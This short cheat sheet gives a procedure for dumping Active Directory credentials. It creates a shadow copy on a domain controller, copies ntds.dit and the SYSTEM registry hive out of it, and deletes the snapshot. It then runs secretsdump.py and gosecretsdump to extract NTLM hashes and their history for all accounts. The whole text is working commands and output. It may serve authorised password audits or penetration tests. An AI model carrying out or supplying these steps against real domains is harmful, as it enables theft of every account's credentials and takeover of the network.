On Domain Controller - create snapshot with vssadmin.exe
.
PS C:\> vssadmin.exe create shadow /for=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
Successfully created shadow copy for 'C:\'
Shadow Copy ID: {3d781b5d-e053-41ad-85d4-5b8f1ffb2d42}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5
NTDS:
PS C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\ntds\ntds.dit c:\ntds.dit
SYSTEM:
PS C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\system32\config\system c:\system
Or use reg save
reg SAVE HKLM\SYSTEM c:\SYSTEM
You can also use ShadowCopyView if you prefer a GUI.
PS C:\> vssadmin delete shadows /shadow={3d781b5d-e053-41ad-85d4-5b8f1ffb2d42}
It can happen that secretsdump.py keeps looping and throwing out hashes. In this case, or maybe even preferably, use Gosecretsdump.
secretsdump.py -system SYSTEM -ntds ntds.dit -hashes lmhash:nthash LOCAL -outputfile extracted-hashes -just-dc-ntlm -user-status -history
./gosecretsdump -system SYSTEM -ntds NTDS.DIT -history -status -out hashes.log
Example NTDS.dit
and SYSTEM
files zipped below.